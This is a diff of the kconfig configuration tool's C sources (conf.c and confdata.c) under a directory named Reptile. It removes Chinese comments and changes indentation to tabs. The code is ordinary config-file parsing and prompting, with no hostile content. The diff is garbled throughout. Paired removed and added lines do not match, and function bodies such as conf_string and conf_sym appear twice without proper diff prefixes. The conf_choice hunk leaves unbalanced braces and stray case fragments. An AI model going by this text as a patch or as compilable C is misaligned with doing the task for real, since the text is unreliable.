-    allyesconfig,       // 所有选项都为 yes
+	allyesconfig,
-    allmodconfig,       // 所有选项都为模块
+	allmodconfig,
-    alldefconfig,       // 所有选项都为默认值
+	alldefconfig,
-    randconfig,         // 随机配置
+	randconfig,
-    defconfig,          // 使用默认配置
+	defconfig,
-    savedefconfig,      // 保存默认配置
+	savedefconfig,
-    listnewconfig,      // 列出新的配置项
+	listnewconfig,
-    olddefconfig,       // 使用旧的默认配置
+	olddefconfig,
-} input_mode = oldaskconfig;  // 设置默认输入模式为 oldaskconfig
+} input_mode = oldaskconfig;
-
+
-// 静态变量声明
+static int indent = 1;
-static int indent = 1;            // 配置输出时的缩进级别
+static int tty_stdio;
-static int tty_stdio;             // 标识标准输入输出是否是终端设备
+static int valid_stdin = 1;
-static int valid_stdin = 1;       // 标识标准输入是否有效
+static int sync_kconfig;
-static int sync_kconfig;          // 同步配置标志
+static int conf_cnt;
-static int conf_cnt;              // 配置项计数器
+static char line[128];
-static char line[128];            // 用于存储输入行的缓冲区
+static struct menu *rootEntry;
-static struct menu *rootEntry;    // 配置菜单的根节点指针
+
 // 打印帮助信息
 static void print_help(struct menu *menu)
 {
-    struct gstr help = str_new();  // 创建一个新的字符串对象
+	struct gstr help = str_new();
-    menu_get_ext_help(menu, &help);  // 获取菜单项的扩展帮助信息
+	menu_get_ext_help(menu, &help);
-    printf("\n%s\n", str_get(&help));  // 打印帮助信息
+	printf("\n%s\n", str_get(&help));
-    str_free(&help);  // 释放帮助字符串资源
+	str_free(&help);
 }
 // 去除字符串两端的空白字符
 static void strip(char *str)
 {
-    char *p = str;
+	char *p = str;
-    int l;
+	int l;
-
+
-    // 跳过前导空格
+	while ((isspace(*p)))
-    while ((isspace(*p)))  
+		p++;
-        p++;
+	l = strlen(p);
-    
+	if (p != str)
-    l = strlen(p);  // 获取字符串的长度
+		memmove(str, p, l + 1);
-    if (p != str)    // 如果有前导空格，移动字符串内容
+	if (!l)
-        memmove(str, p, l + 1);
+		return;
-
+	p = str + l - 1;
-    if (!l)          // 如果字符串为空，返回
+	while ((isspace(*p)))
-        return;
+		*p-- = 0;
    // 去除尾部空格
    p = str + l - 1;
    while ((isspace(*p)))  // 从字符串末尾向前查找空格并去除
        *p-- = 0;
 }
 // 检查标准输入是否有效
 static void check_stdin(void)
 {
-    if (!valid_stdin) {  // 如果标准输入无效
+	if (!valid_stdin) {
-        printf(_("aborted!\n\n"));
+		printf(_("aborted!\n\n"));
-        printf(_("Console input/output is redirected. "));
+		printf(_("Console input/output is redirected. "));
-        printf(_("Run 'make oldconfig' to update configuration.\n\n"));
+		printf(_("Run 'make oldconfig' to update configuration.\n\n"));
-        exit(1);  // 退出程序
+		exit(1);
-    }
+	}
 }
 // 配置选项的处理函数
 static int conf_askvalue(struct symbol *sym, const char *def)
 {
-    enum symbol_type type = sym_get_type(sym);  // 获取符号的类型
+	enum symbol_type type = sym_get_type(sym);
-
+
-    if (!sym_has_value(sym))  // 如果没有值，标记为新选项
+	if (!sym_has_value(sym))
-        printf(_("(NEW) "));
+		printf(_("(NEW) "));
-
+
-    line[0] = '\n';
+	line[0] = '\n';
-    line[1] = 0;
+	line[1] = 0;
-
+
-    if (!sym_is_changable(sym)) {  // 如果符号不可修改，直接输出默认值
+	if (!sym_is_changable(sym)) {
-        printf("%s\n", def);
+		printf("%s\n", def);
-        line[0] = '\n';
+		line[0] = '\n';
-        line[1] = 0;
+		line[1] = 0;
-        return 0;
+		return 0;
-    }
+	}
-
+
-    // 根据输入模式不同执行不同的操作
+	switch (input_mode) {
-    switch (input_mode) {
+	case oldconfig:
-    case oldconfig:
+	case silentoldconfig:
-    case silentoldconfig:
+		if (sym_has_value(sym)) {
-        if (sym_has_value(sym)) {  // 如果已有值，直接输出默认值
+			printf("%s\n", def);
-            printf("%s\n", def);
+			return 0;
-            return 0;
+		}
-        }
+		check_stdin();
-        check_stdin();  // 检查标准输入有效性
+		/* fall through */
-        /* fall through */
+	case oldaskconfig:
-    case oldaskconfig:
+		fflush(stdout);
-        fflush(stdout);  // 刷新标准输出缓冲区
+		xfgets(line, 128, stdin);
-        xfgets(line, 128, stdin);  // 获取用户输入
+		if (!tty_stdio)
-        if (!tty_stdio)  // 如果标准输入不是终端，换行
+			printf("\n");
-            printf("\n");
+		return 1;
-        return 1;
+	default:
-    default:
+		break;
-        break;
+	}
-    }
+
-
+	switch (type) {
-    // 根据符号类型进行处理
+	case S_INT:
-    switch (type) {
+	case S_HEX:
-    case S_INT:
+	case S_STRING:
-    case S_HEX:
+		printf("%s\n", def);
-    case S_STRING:
+		return 1;
-        printf("%s\n", def);
+	default:
-        return 1;
+		;
-    default:
+	}
-        ;
+	printf("%s", line);
-    }
+	return 1;
    printf("%s", line);  // 输出用户输入的内容
    return 1;
 }
 // 配置字符串类型的处理函数
 static int conf_string(struct menu *menu)
 {
-    struct symbol *sym = menu->sym;
+	struct symbol *sym = menu->sym;
-    const char *def;
+	const char *def;
    while (1) {
        printf("%*s%s ", indent - 1, "", _(menu->prompt->text));  // 打印菜单提示
        printf("(%s) ", sym->name);  // 打印符号名称
        def = sym_get_string_value(sym);  // 获取符号的默认字符串值
        if (def)  // 如果有默认值，打印出来
            printf("[%s] ", def);
        if (!conf_askvalue(sym, def))  // 获取用户输入并处理
            return 0;
        // 根据用户输入的内容进行处理
        switch (line[0]) {
        case '\n':
            break;  // 如果用户没有输入内容，继续
        case '?':
            // 打印帮助信息
            if (line[1] == '\n') {
                print_help(menu);  // 打印帮助
                def = NULL;
                break;
            }
            /* fall through */
        default:
            line[strlen(line) - 1] = 0;  // 去掉换行符
            def = line;  // 将用户输入的内容赋给 def
        }
        // 设置符号的字符串值
        if (def && sym_set_string_value(sym, def))
            return 0;
    }
 }
 	while (1) {
 		printf("%*s%s ", indent - 1, "", _(menu->prompt->text));
 		printf("(%s) ", sym->name);
 		def = sym_get_string_value(sym);
 		if (sym_get_string_value(sym))
 			printf("[%s] ", def);
 		if (!conf_askvalue(sym, def))
 			return 0;
 		switch (line[0]) {
 		case '\n':
 			break;
 		case '?':
 			/* print help */
 			if (line[1] == '\n') {
 				print_help(menu);
 				def = NULL;
 				break;
 			}
 			/* fall through */
 		default:
 			line[strlen(line)-1] = 0;
 			def = line;
 		}
 		if (def && sym_set_string_value(sym, def))
 			return 0;
 	}
 }
 // 配置符号的值（如：yes、no、mod）的函数
 static int conf_sym(struct menu *menu)
 {
-    struct symbol *sym = menu->sym;  // 获取菜单项的符号
+	struct symbol *sym = menu->sym;
-    tristate oldval, newval;         // 旧值和新值变量，tristate表示三种状态（yes、no、mod）
+	tristate oldval, newval;
    while (1) {
        // 打印菜单提示信息，包括符号名称（如果存在）
        printf("%*s%s ", indent - 1, "", _(menu->prompt->text));  // 打印缩进和提示文本
        if (sym->name)  // 如果符号有名称，打印符号名称
            printf("(%s) ", sym->name);
        putchar('[');  // 打印开头的方括号
        oldval = sym_get_tristate_value(sym);  // 获取符号的当前值
        // 根据当前的状态值（oldval），打印相应的字符
        switch (oldval) {
        case no:
            putchar('N');  // 输出 'N' 表示当前为 no
            break;
        case mod:
            putchar('M');  // 输出 'M' 表示当前为 mod
            break;
        case yes:
            putchar('Y');  // 输出 'Y' 表示当前为 yes
            break;
        }
        // 根据当前的状态值，显示可选的值（no、mod、yes），如果符号的值在范围内
        if (oldval != no && sym_tristate_within_range(sym, no))
            printf("/n");
        if (oldval != mod && sym_tristate_within_range(sym, mod))
            printf("/m");
        if (oldval != yes && sym_tristate_within_range(sym, yes))
            printf("/y");
        // 如果菜单项有帮助信息，显示帮助提示
        if (menu_has_help(menu))
            printf("/?");
        printf("] ");  // 打印结束的方括号
        // 询问用户输入新值，如果没有输入有效值，返回 0
        if (!conf_askvalue(sym, sym_get_string_value(sym)))
            return 0;
        strip(line);  // 去除用户输入的字符串两端空格
        // 根据用户输入的值进行处理
        switch (line[0]) {
        case 'n':
        case 'N':  // 如果输入是 'n' 或 'N'，设置新值为 no
            newval = no;
            if (!line[1] || !strcmp(&line[1], "o"))
                break;
            continue;  // 如果有其他字符，继续下一次循环
        case 'm':
        case 'M':  // 如果输入是 'm' 或 'M'，设置新值为 mod
            newval = mod;
            if (!line[1])
                break;
            continue;  // 如果有其他字符，继续下一次循环
        case 'y':
        case 'Y':  // 如果输入是 'y' 或 'Y'，设置新值为 yes
            newval = yes;
            if (!line[1] || !strcmp(&line[1], "es"))
                break;
            continue;  // 如果有其他字符，继续下一次循环
        case 0:  // 如果没有输入内容，保留旧值
            newval = oldval;
            break;
        case '?':  // 如果输入是 '?'，显示帮助
            goto help;
        default:
            continue;  // 继续循环，直到输入合法
        }
        // 设置符号的新值
        if (sym_set_tristate_value(sym, newval))
            return 0;  // 如果设置失败，返回 0
 	while (1) {
 		printf("%*s%s ", indent - 1, "", _(menu->prompt->text));
 		if (sym->name)
 			printf("(%s) ", sym->name);
 		putchar('[');
 		oldval = sym_get_tristate_value(sym);
 		switch (oldval) {
 		case no:
 			putchar('N');
 			break;
 		case mod:
 			putchar('M');
 			break;
 		case yes:
 			putchar('Y');
 			break;
 		}
 		if (oldval != no && sym_tristate_within_range(sym, no))
 			printf("/n");
 		if (oldval != mod && sym_tristate_within_range(sym, mod))
 			printf("/m");
 		if (oldval != yes && sym_tristate_within_range(sym, yes))
 			printf("/y");
 		if (menu_has_help(menu))
 			printf("/?");
 		printf("] ");
 		if (!conf_askvalue(sym, sym_get_string_value(sym)))
 			return 0;
 		strip(line);
 		switch (line[0]) {
 		case 'n':
 		case 'N':
 			newval = no;
 			if (!line[1] || !strcmp(&line[1], "o"))
 				break;
 			continue;
 		case 'm':
 		case 'M':
 			newval = mod;
 			if (!line[1])
 				break;
 			continue;
 		case 'y':
 		case 'Y':
 			newval = yes;
 			if (!line[1] || !strcmp(&line[1], "es"))
 				break;
 			continue;
 		case 0:
 			newval = oldval;
 			break;
 		case '?':
 			goto help;
 		default:
 			continue;
 		}
 		if (sym_set_tristate_value(sym, newval))
 			return 0;
 help:
-        print_help(menu);  // 打印帮助信息
+		print_help(menu);
-    }
+	}
 }
 // 配置选择菜单项的函数
 static int conf_choice(struct menu *menu)
 {
-    struct symbol *sym, *def_sym;
+	struct symbol *sym, *def_sym;
-    struct menu *child;
+	struct menu *child;
-    bool is_new;
+	bool is_new;
-
+
-    sym = menu->sym;  // 获取当前菜单项的符号
+	sym = menu->sym;
-    is_new = !sym_has_value(sym);  // 检查符号是否有值（是否为新符号）
+	is_new = !sym_has_value(sym);
-
+	if (sym_is_changable(sym)) {
-    // 如果符号可修改，进行符号的配置
+		conf_sym(menu);
-    if (sym_is_changable(sym)) {
+		sym_calc_value(sym);
-        conf_sym(menu);  // 调用 conf_sym 函数配置符号
+		switch (sym_get_tristate_value(sym)) {
-        sym_calc_value(sym);  // 计算符号的值
+		case no:
-
+			return 1;
-        // 根据符号的值执行不同的操作
+		case mod:
-        switch (sym_get_tristate_value(sym)) {
+			return 0;
-        case no:  // 如果值是 no，返回 1
+		case yes:
-            return 1;
+			break;
-        case mod:  // 如果值是 mod，返回 0
+		}
-            return 0;
+	} else {
-        case yes:  // 如果值是 yes，继续执行
+		switch (sym_get_tristate_value(sym)) {
-            break;
+		case no:
-        }
+			return 1;
-    } else {  // 如果符号不可修改
+		case mod:
-        switch (sym_get_tristate_value(sym)) {
+			printf("%*s%s\n", indent - 1, "", _(menu_get_prompt(menu)));
-        case no:  // 如果值是 no，返回 1
+			return 0;
-            return 1;
+		case yes:
-        case mod:  // 如果值是 mod，打印菜单提示并返回 0
+			break;
-            printf("%*s%s\n", indent - 1, "", _(menu_get_prompt(menu)));
+		}
-            return 0;
+	}
        case yes:  // 如果值是 yes，继续执行
            break;
        }
    }
 }
 	while (1) {
 		int cnt, def;
--- a/src/Reptile/scripts/kconfig/confdata.c
+++ b/src/Reptile/scripts/kconfig/confdata.c
@ -17,473 +17,456 @@
 #include "lkc.h"
 // 定义警告信息输出函数
 static void conf_warning(const char *fmt, ...)
-    __attribute__ ((format (printf, 1, 2)));
+	__attribute__ ((format (printf, 1, 2)));
 // 定义普通信息输出函数
 static void conf_message(const char *fmt, ...)
-    __attribute__ ((format (printf, 1, 2)));
+	__attribute__ ((format (printf, 1, 2)));
 // 配置文件名
 static const char *conf_filename;
 // 当前行号
 static int conf_lineno, conf_warnings, conf_unsaved;
 // 默认配置文件名
 const char conf_defname[] = ".defconfig";
 // 输出警告信息
 static void conf_warning(const char *fmt, ...)
 {
-    va_list ap;
+	va_list ap;
-    va_start(ap, fmt);
+	va_start(ap, fmt);
-    fprintf(stderr, "%s:%d:warning: ", conf_filename, conf_lineno);
+	fprintf(stderr, "%s:%d:warning: ", conf_filename, conf_lineno);
-    vfprintf(stderr, fmt, ap);
+	vfprintf(stderr, fmt, ap);
-    fprintf(stderr, "\n");
+	fprintf(stderr, "\n");
-    va_end(ap);
+	va_end(ap);
-    conf_warnings++;
+	conf_warnings++;
 }
 // 默认的消息回调函数
 static void conf_default_message_callback(const char *fmt, va_list ap)
 {
-    printf("#\n# ");
+	printf("#\n# ");
-    vprintf(fmt, ap);
+	vprintf(fmt, ap);
-    printf("\n#\n");
+	printf("\n#\n");
 }
 // 消息回调函数指针
 static void (*conf_message_callback) (const char *fmt, va_list ap) =
-    conf_default_message_callback;
+	conf_default_message_callback;
 // 设置消息回调函数
 void conf_set_message_callback(void (*fn) (const char *fmt, va_list ap))
 {
-    conf_message_callback = fn;
+	conf_message_callback = fn;
 }
 // 输出消息信息
 static void conf_message(const char *fmt, ...)
 {
-    va_list ap;
+	va_list ap;
-    va_start(ap, fmt);
+	va_start(ap, fmt);
-    if (conf_message_callback)
+	if (conf_message_callback)
-        conf_message_callback(fmt, ap);
+		conf_message_callback(fmt, ap);
 }
 // 获取配置文件名
 const char *conf_get_configname(void)
 {
-    char *name = getenv(PRODUCT_ENV"_CONFIG");
+	char *name = getenv(PRODUCT_ENV"_CONFIG");
-    return name ? name : ".config";
+	return name ? name : ".config";
 }
 // 获取自动配置文件名
 const char *conf_get_autoconfig_name(void)
 {
-    return getenv(PRODUCT_ENV"_AUTOCONFIG");
+	return getenv(PRODUCT_ENV"_AUTOCONFIG");
 }
 // 展开配置值中的变量
 static char *conf_expand_value(const char *in)
 {
-    struct symbol *sym;
+	struct symbol *sym;
-    const char *src;
+	const char *src;
-    static char res_value[SYMBOL_MAXLENGTH];
+	static char res_value[SYMBOL_MAXLENGTH];
-    char *dst, name[SYMBOL_MAXLENGTH];
+	char *dst, name[SYMBOL_MAXLENGTH];
-
+
-    res_value[0] = 0;
+	res_value[0] = 0;
-    dst = name;
+	dst = name;
-    while ((src = strchr(in, '$'))) {
+	while ((src = strchr(in, '$'))) {
-        strncat(res_value, in, src - in);
+		strncat(res_value, in, src - in);
-        src++;
+		src++;
-        dst = name;
+		dst = name;
-        while (isalnum(*src) || *src == '_')
+		while (isalnum(*src) || *src == '_')
-            *dst++ = *src++;
+			*dst++ = *src++;
-        *dst = 0;
+		*dst = 0;
-        sym = sym_lookup(name, 0);
+		sym = sym_lookup(name, 0);
-        sym_calc_value(sym);
+		sym_calc_value(sym);
-        strcat(res_value, sym_get_string_value(sym));
+		strcat(res_value, sym_get_string_value(sym));
-        in = src;
+		in = src;
-    }
+	}
-    strcat(res_value, in);
+	strcat(res_value, in);
-
+
-    return res_value;
+	return res_value;
 }
 // 获取默认配置文件名
 char *conf_get_default_confname(void)
 {
-    struct stat buf;
+	struct stat buf;
-    static char fullname[PATH_MAX+1];
+	static char fullname[PATH_MAX+1];
-    char *env, *name;
+	char *env, *name;
-
+
-    name = conf_expand_value(conf_defname);
+	name = conf_expand_value(conf_defname);
-    env = getenv(SRCTREE);
+	env = getenv(SRCTREE);
-    if (env) {
+	if (env) {
-        sprintf(fullname, "%s/%s", env, name);
+		sprintf(fullname, "%s/%s", env, name);
-        if (!stat(fullname, &buf))
+		if (!stat(fullname, &buf))
-            return fullname;
+			return fullname;
-    }
+	}
-    return name;
+	return name;
 }
 // 设置符号值
 static int conf_set_sym_val(struct symbol *sym, int def, int def_flags, char *p)
 {
-    char *p2;
+	char *p2;
-
+
-    switch (sym->type) {
+	switch (sym->type) {
-    case S_TRISTATE:
+	case S_TRISTATE:
-        if (p[0] == 'm') {
+		if (p[0] == 'm') {
-            sym->def[def].tri = mod;
+			sym->def[def].tri = mod;
-            sym->flags |= def_flags;
+			sym->flags |= def_flags;
-            break;
+			break;
-        }
+		}
-        // 跌落至下一个case
+		/* fall through */
-    case S_BOOLEAN:
+	case S_BOOLEAN:
-        if (p[0] == 'y') {
+		if (p[0] == 'y') {
-            sym->def[def].tri = yes;
+			sym->def[def].tri = yes;
-            sym->flags |= def_flags;
+			sym->flags |= def_flags;
-            break;
+			break;
-        }
+		}
-        if (p[0] == 'n') {
+		if (p[0] == 'n') {
-            sym->def[def].tri = no;
+			sym->def[def].tri = no;
-            sym->flags |= def_flags;
+			sym->flags |= def_flags;
-            break;
+			break;
-        }
+		}
-        if (def != S_DEF_AUTO)
+		if (def != S_DEF_AUTO)
-            conf_warning("symbol value '%s' invalid for %s",
+			conf_warning("symbol value '%s' invalid for %s",
-                         p, sym->name);
+				     p, sym->name);
-        return 1;
+		return 1;
-    case S_OTHER:
+	case S_OTHER:
-        if (*p != '"') {
+		if (*p != '"') {
-            for (p2 = p; *p2 && !isspace(*p2); p2++)
+			for (p2 = p; *p2 && !isspace(*p2); p2++)
-                ;
+				;
-            sym->type = S_STRING;
+			sym->type = S_STRING;
-            goto done;
+			goto done;
-        }
+		}
-        // 跌落至下一个case
+		/* fall through */
-    case S_STRING:
+	case S_STRING:
-        if (*p++ != '"')
+		if (*p++ != '"')
-            break;
+			break;
-        for (p2 = p; (p2 = strpbrk(p2, "\"\\")); p2++) {
+		for (p2 = p; (p2 = strpbrk(p2, "\"\\")); p2++) {
-            if (*p2 == '"') {
+			if (*p2 == '"') {
-                *p2 = 0;
+				*p2 = 0;
-                break;
+				break;
-            }
+			}
-            memmove(p2, p2 + 1, strlen(p2));
+			memmove(p2, p2 + 1, strlen(p2));
-        }
+		}
-        if (!p2) {
+		if (!p2) {
-            if (def != S_DEF_AUTO)
+			if (def != S_DEF_AUTO)
-                conf_warning("invalid string found");
+				conf_warning("invalid string found");
-            return 1;
+			return 1;
-        }
+		}
-        // 跌落至下一个case
+		/* fall through */
-    case S_INT:
+	case S_INT:
-    case S_HEX:
+	case S_HEX:
-    done:
+	done:
-        if (sym_string_valid(sym, p)) {
+		if (sym_string_valid(sym, p)) {
-            sym->def[def].val = strdup(p);
+			sym->def[def].val = strdup(p);
-            sym->flags |= def_flags;
+			sym->flags |= def_flags;
-        } else {
+		} else {
-            if (def != S_DEF_AUTO)
+			if (def != S_DEF_AUTO)
-                conf_warning("symbol value '%s' invalid for %s",
+				conf_warning("symbol value '%s' invalid for %s",
-                             p, sym->name);
+					     p, sym->name);
-            return 1;
+			return 1;
-        }
+		}
-        break;
+		break;
-    default:
+	default:
-        ;
+		;
-    }
+	}
-    return 0;
+	return 0;
 }
 // 增加字节到行缓冲区
 #define LINE_GROWTH 16
 static int add_byte(int c, char **lineptr, size_t slen, size_t *n)
 {
-    char *nline;
+	char *nline;
-    size_t new_size = slen + 1;
+	size_t new_size = slen + 1;
-    if (new_size > *n) {
+	if (new_size > *n) {
-        new_size += LINE_GROWTH - 1;
+		new_size += LINE_GROWTH - 1;
-        new_size *= 2;
+		new_size *= 2;
-        nline = realloc(*lineptr, new_size);
+		nline = realloc(*lineptr, new_size);
-        if (!nline)
+		if (!nline)
-            return -1;
+			return -1;
-
+
-        *lineptr = nline;
+		*lineptr = nline;
-        *n = new_size;
+		*n = new_size;
-    }
+	}
-
+
-    (*lineptr)[slen] = c;
+	(*lineptr)[slen] = c;
-
+
-    return 0;
+	return 0;
 }
 // 兼容getline函数
 static ssize_t compat_getline(char **lineptr, size_t *n, FILE *stream)
 {
-    char *line = *lineptr;
+	char *line = *lineptr;
-    size_t slen = 0;
+	size_t slen = 0;
-
+
-    for (;;) {
+	for (;;) {
-        int c = getc(stream);
+		int c = getc(stream);
-
+
-        switch (c) {
+		switch (c) {
-        case '\n':
+		case '\n':
-            if (add_byte(c, &line, slen, n) < 0)
+			if (add_byte(c, &line, slen, n) < 0)
-                goto e_out;
+				goto e_out;
-            slen++;
+			slen++;
-            // 跌落至下一个case
+			/* fall through */
-        case EOF:
+		case EOF:
-            if (add_byte('\0', &line, slen, n) < 0)
+			if (add_byte('\0', &line, slen, n) < 0)
-                goto e_out;
+				goto e_out;
-            *lineptr = line;
+			*lineptr = line;
-            if (slen == 0)
+			if (slen == 0)
-                return -1;
+				return -1;
-            return slen;
+			return slen;
-        default:
+		default:
-            if (add_byte(c, &line, slen, n) < 0)
+			if (add_byte(c, &line, slen, n) < 0)
-                goto e_out;
+				goto e_out;
-            slen++;
+			slen++;
-        }
+		}
-    }
+	}
 e_out:
-    line[slen-1] = '\0';
+	line[slen-1] = '\0';
-    *lineptr = line;
+	*lineptr = line;
-    return -1;
+	return -1;
 }
 // 读取简单的配置文件
 int conf_read_simple(const char *name, int def)
 {
-    FILE *in = NULL;
+	FILE *in = NULL;
-    char   *line = NULL;
+	char   *line = NULL;
-    size_t  line_asize = 0;
+	size_t  line_asize = 0;
-    char *p, *p2;
+	char *p, *p2;
-    struct symbol *sym;
+	struct symbol *sym;
-    int i, def_flags;
+	int i, def_flags;
-
+
-    if (name) {
+	if (name) {
-        in = zconf_fopen(name);
+		in = zconf_fopen(name);
-    } else {
+	} else {
-        struct property *prop;
+		struct property *prop;
-
+
-        name = conf_get_configname();
+		name = conf_get_configname();
-        in = zconf_fopen(name);
+		in = zconf_fopen(name);
-        if (in)
+		if (in)
-            goto load;
+			goto load;
-        sym_add_change_count(1);
+		sym_add_change_count(1);
-        if (!sym_defconfig_list) {
+		if (!sym_defconfig_list) {
-            if (modules_sym)
+			if (modules_sym)
-                sym_calc_value(modules_sym);
+				sym_calc_value(modules_sym);
-            return 1;
+			return 1;
-        }
+		}
-
+
-        for_all_defaults(sym_defconfig_list, prop) {
+		for_all_defaults(sym_defconfig_list, prop) {
-            if (expr_calc_value(prop->visible.expr) == no ||
+			if (expr_calc_value(prop->visible.expr) == no ||
-                prop->expr->type != E_SYMBOL)
+			    prop->expr->type != E_SYMBOL)
-                continue;
+				continue;
-            name = conf_expand_value(prop->expr->left.sym->name);
+			name = conf_expand_value(prop->expr->left.sym->name);
-            in = zconf_fopen(name);
+			in = zconf_fopen(name);
-            if (in) {
+			if (in) {
-                conf_message(_("using defaults found in %s"),
+				conf_message(_("using defaults found in %s"),
-                             name);
+					 name);
-                goto load;
+				goto load;
-            }
+			}
-        }
+		}
-    }
+	}
-    if (!in)
+	if (!in)
-        return 1;
+		return 1;
 load:
-    conf_filename = name;
+	conf_filename = name;
-    conf_lineno = 0;
+	conf_lineno = 0;
-    conf_warnings = 0;
+	conf_warnings = 0;
-    conf_unsaved = 0;
+	conf_unsaved = 0;
-
+
-    def_flags = SYMBOL_DEF << def;
+	def_flags = SYMBOL_DEF << def;
-    for_all_symbols(i, sym) {
+	for_all_symbols(i, sym) {
-        sym->flags |= SYMBOL_CHANGED;
+		sym->flags |= SYMBOL_CHANGED;
-        sym->flags &= ~(def_flags|SYMBOL_VALID);
+		sym->flags &= ~(def_flags|SYMBOL_VALID);
-        if (sym_is_choice(sym))
+		if (sym_is_choice(sym))
-            sym->flags |= def_flags;
+			sym->flags |= def_flags;
-        switch (sym->type) {
+		switch (sym->type) {
-        case S_INT:
+		case S_INT:
-        case S_HEX:
+		case S_HEX:
-        case S_STRING:
+		case S_STRING:
-            if (sym->def[def].val)
+			if (sym->def[def].val)
-                free(sym->def[def].val);
+				free(sym->def[def].val);
-            // 跌落至下一个case
+			/* fall through */
-        default:
+		default:
-            sym->def[def].val = NULL;
+			sym->def[def].val = NULL;
-            sym->def[def].tri = no;
+			sym->def[def].tri = no;
-        }
+		}
-    }
+	}
-
+
-    while (compat_getline(&line, &line_asize, in) != -1) {
+	while (compat_getline(&line, &line_asize, in) != -1) {
-        conf_lineno++;
+		conf_lineno++;
-        sym = NULL;
+		sym = NULL;
-        if (line[0] == '#') {
+		if (line[0] == '#') {
-            if (memcmp(line + 2, CONFIG_, strlen(CONFIG_)))
+			if (memcmp(line + 2, CONFIG_, strlen(CONFIG_)))
-                continue;
+				continue;
-            p = strchr(line + 2 + strlen(CONFIG_), ' ');
+			p = strchr(line + 2 + strlen(CONFIG_), ' ');
-            if (!p)
+			if (!p)
-                continue;
+				continue;
-            *p++ = 0;
+			*p++ = 0;
-            if (strncmp(p, "is not set", 10))
+			if (strncmp(p, "is not set", 10))
-                continue;
+				continue;
-            if (def == S_DEF_USER) {
+			if (def == S_DEF_USER) {
-                sym = sym_find(line + 2 + strlen(CONFIG_));
+				sym = sym_find(line + 2 + strlen(CONFIG_));
-                if (!sym) {
+				if (!sym) {
-                    sym_add_change_count(1);
+					sym_add_change_count(1);
-                    goto setsym;
+					goto setsym;
-                }
+				}
-            } else {
+			} else {
-                sym = sym_lookup(line + 2 + strlen(CONFIG_), 0);
+				sym = sym_lookup(line + 2 + strlen(CONFIG_), 0);
-                if (sym->type == S_UNKNOWN)
+				if (sym->type == S_UNKNOWN)
-                    sym->type = S_BOOLEAN;
+					sym->type = S_BOOLEAN;
-            }
+			}
-            if (sym->flags & def_flags) {
+			if (sym->flags & def_flags) {
-                conf_warning("override: reassigning to symbol %s", sym->name);
+				conf_warning("override: reassigning to symbol %s", sym->name);
-            }
+			}
-            switch (sym->type) {
+			switch (sym->type) {
-            case S_BOOLEAN:
+			case S_BOOLEAN:
-            case S_TRISTATE:
+			case S_TRISTATE:
-                sym->def[def].tri = no;
+				sym->def[def].tri = no;
-                sym->flags |= def_flags;
+				sym->flags |= def_flags;
-                break;
+				break;
-            default:
+			default:
-                ;
+				;
-            }
+			}
-        } else if (memcmp(line, CONFIG_, strlen(CONFIG_)) == 0) {
+		} else if (memcmp(line, CONFIG_, strlen(CONFIG_)) == 0) {
-            p = strchr(line + strlen(CONFIG_), '=');
+			p = strchr(line + strlen(CONFIG_), '=');
-            if (!p)
+			if (!p)
-                continue;
+				continue;
-            *p++ = 0;
+			*p++ = 0;
-            p2 = strchr(p, '\n');
+			p2 = strchr(p, '\n');
-            if (p2) {
+			if (p2) {
-                *p2-- = 0;
+				*p2-- = 0;
-                if (*p2 == '\r')
+				if (*p2 == '\r')
-                    *p2 = 0;
+					*p2 = 0;
-            }
+			}
-            if (def == S_DEF_USER) {
+			if (def == S_DEF_USER) {
-                sym = sym_find(line + strlen(CONFIG_));
+				sym = sym_find(line + strlen(CONFIG_));
-                if (!sym) {
+				if (!sym) {
-                    sym_add_change_count(1);
+					sym_add_change_count(1);
-                    goto setsym;
+					goto setsym;
-                }
+				}
-            } else {
+			} else {
-                sym = sym_lookup(line + strlen(CONFIG_), 0);
+				sym = sym_lookup(line + strlen(CONFIG_), 0);
-                if (sym->type == S_UNKNOWN)
+				if (sym->type == S_UNKNOWN)
-                    sym->type = S_OTHER;
+					sym->type = S_OTHER;
-            }
+			}
-            if (sym->flags & def_flags) {
+			if (sym->flags & def_flags) {
-                conf_warning("override: reassigning to symbol %s", sym->name);
+				conf_warning("override: reassigning to symbol %s", sym->name);
-            }
+			}
-            if (conf_set_sym_val(sym, def, def_flags, p))
+			if (conf_set_sym_val(sym, def, def_flags, p))
-                continue;
+				continue;
-        } else {
+		} else {
-            if (line[0] != '\r' && line[0] != '\n')
+			if (line[0] != '\r' && line[0] != '\n')
-                conf_warning("unexpected data");
+				conf_warning("unexpected data");
-            continue;
+			continue;
-        }
+		}
 setsym:
-        if (sym && sym_is_choice_value(sym)) {
+		if (sym && sym_is_choice_value(sym)) {
-            struct symbol *cs = prop_get_symbol(sym_get_choice_prop(sym));
+			struct symbol *cs = prop_get_symbol(sym_get_choice_prop(sym));
-            switch (sym->def[def].tri) {
+			switch (sym->def[def].tri) {
-            case no:
+			case no:
-                break;
+				break;
-            case mod:
+			case mod:
-                if (cs->def[def].tri == yes) {
+				if (cs->def[def].tri == yes) {
-                    conf_warning("%s creates inconsistent choice state", sym->name);
+					conf_warning("%s creates inconsistent choice state", sym->name);
-                    cs->flags &= ~def_flags;
+					cs->flags &= ~def_flags;
-                }
+				}
-                break;
+				break;
-            case yes:
+			case yes:
-                if (cs->def[def].tri != no)
+				if (cs->def[def].tri != no)
-                    conf_warning("override: %s changes choice state", sym->name);
+					conf_warning("override: %s changes choice state", sym->name);
-                cs->def[def].val = sym;
+				cs->def[def].val = sym;
-                break;
+				break;
-            }
+			}
-            cs->def[def].tri = EXPR_OR(cs->def[def].tri, sym->def[def].tri);
+			cs->def[def].tri = EXPR_OR(cs->def[def].tri, sym->def[def].tri);
-        }
+		}
-    }
+	}
-    free(line);
+	free(line);
-    fclose(in);
+	fclose(in);
-
+
-    if (modules_sym)
+	if (modules_sym)
-        sym_calc_value(modules_sym);
+		sym_calc_value(modules_sym);
-    return 0;
+	return 0;
 }
 // 读取配置文件
 int conf_read(const char *name)
 {
-    struct symbol *sym;
+	struct symbol *sym;
-    int i;
+	int i;
-
+
-    sym_set_change_count(0);
+	sym_set_change_count(0);
-
+
-    if (conf_read_simple(name, S_DEF_USER))
+	if (conf_read_simple(name, S_DEF_USER))
-        return 1;
+		return 1;
-
+
-    for_all_symbols(i, sym) {
+	for_all_symbols(i, sym) {
-        sym_calc_value(sym);
+		sym_calc_value(sym);
-        if (sym_is_choice(sym) || (sym->flags & SYMBOL_AUTO))
+		if (sym_is_choice(sym) || (sym->flags & SYMBOL_AUTO))
-            continue;
+			continue;
-        if (sym_has_value(sym) && (sym->flags & SYMBOL_WRITE)) {
+		if (sym_has_value(sym) && (sym->flags & SYMBOL_WRITE)) {
